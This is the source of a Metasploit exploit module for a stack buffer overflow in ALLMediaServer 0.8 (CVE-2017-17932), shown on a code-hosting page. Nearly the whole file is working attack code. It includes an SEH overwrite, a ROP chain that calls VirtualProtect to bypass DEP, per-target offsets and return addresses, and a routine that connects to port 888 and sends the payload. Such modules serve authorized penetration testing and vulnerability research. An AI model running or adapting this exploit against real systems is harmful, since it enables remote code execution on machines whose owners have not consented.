Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/misc/allmediaserver_bof.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'ALLMediaServer 0.8 Buffer Overflow',14'Description' => %q{15This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability16is caused due to a boundary error within the handling of HTTP request.1718While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't19reliable across virtual (VMWare, VirtualBox) and physical environments. Because of20this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default21DEP is OptIn and AllMediaServer won't run with DEP.22},23'License' => MSF_LICENSE,24'Author' =>25[26'motaz reda <motazkhodair[at]gmail.com>', # Original discovery27'modpr0be <tom[at]spentera.com>', # Metasploit module28'juan vazquez' # More improvement29],30'References' =>31[32[ 'CVE', '2017-17932' ],33[ 'OSVDB', '83889' ],34[ 'EDB', '19625' ]35],36'DefaultOptions' =>37{38'EXITFUNC' => 'thread', #none/process/thread/seh39},40'Platform' => 'win',41'Payload' =>42{43'BadChars' => "",44'Space' => 660,45'DisableNops' => true46},4748'Targets' =>49[50[ 'ALLMediaServer 0.8 / Windows XP SP3 - English',51{52'Ret' => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll53'OffsetRop' => 696,54'jmp' => 264,55'Offset' => 107256}57],58[ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',59{60'Ret' => 0x6ac5cc92, # ppr from avformat-53.dll61'Offset' => 107262}63],64],65'Privileged' => false,66'DisclosureDate' => '2012-07-04',67'DefaultTarget' => 1))6869register_options([Opt::RPORT(888)])7071end7273def junk(n=1)74return [rand_text_alpha(4).unpack("L")[0]] * n75end7677def nops(rop=false, n=1)78return rop ? [0x665a0aa1] * n : [0x90909090] * n79end8081def asm(code)82Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string83end8485def exploit86#with help from mona :)87rop = [88nops(true, 12), #ROP NOP890x65f6faa7, # POP EAX # RETN900x671ee4e0, # ptr to &VirtualProtect()910x6ac1ccb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN920x667ceedf, # PUSH EAX # POP ESI # POP EDI # RETN93junk,940x65f5f09d, # POP EBP # RETN950x65f9830d, # & call esp960x6ac1c1d5, # POP EBX # RETN970x00000600, # 0x00000320-> ebx980x6672a1e2, # POP EDX # RETN990x00000040, # 0x00000040-> edx1000x665a09df, # POP ECX # RETN1010x6ad58a3d, # &Writable location1020x6ac7a771, # POP EDI # RETN103nops(true), # RETN (ROP NOP)1040x6682f9f4, # POP EAX # RETN105nops, # nop1060x663dcbd2 # PUSHAD # RETN107].flatten.pack("V*")108109connect110111if target.name =~ /Windows 7/112buffer = rand_text(target['Offset'])113buffer << generate_seh_record(target.ret)114buffer << payload.encoded115else116buffer = rand_text(target['OffsetRop']) #junk117buffer << rop118buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload119buffer << rand_text(target['Offset'] - buffer.length)120buffer << generate_seh_record(target.ret)121buffer << payload.encoded122end123124print_status("Sending payload to ALLMediaServer on #{target.name}...")125sock.put(buffer)126127disconnect128129end130end131132133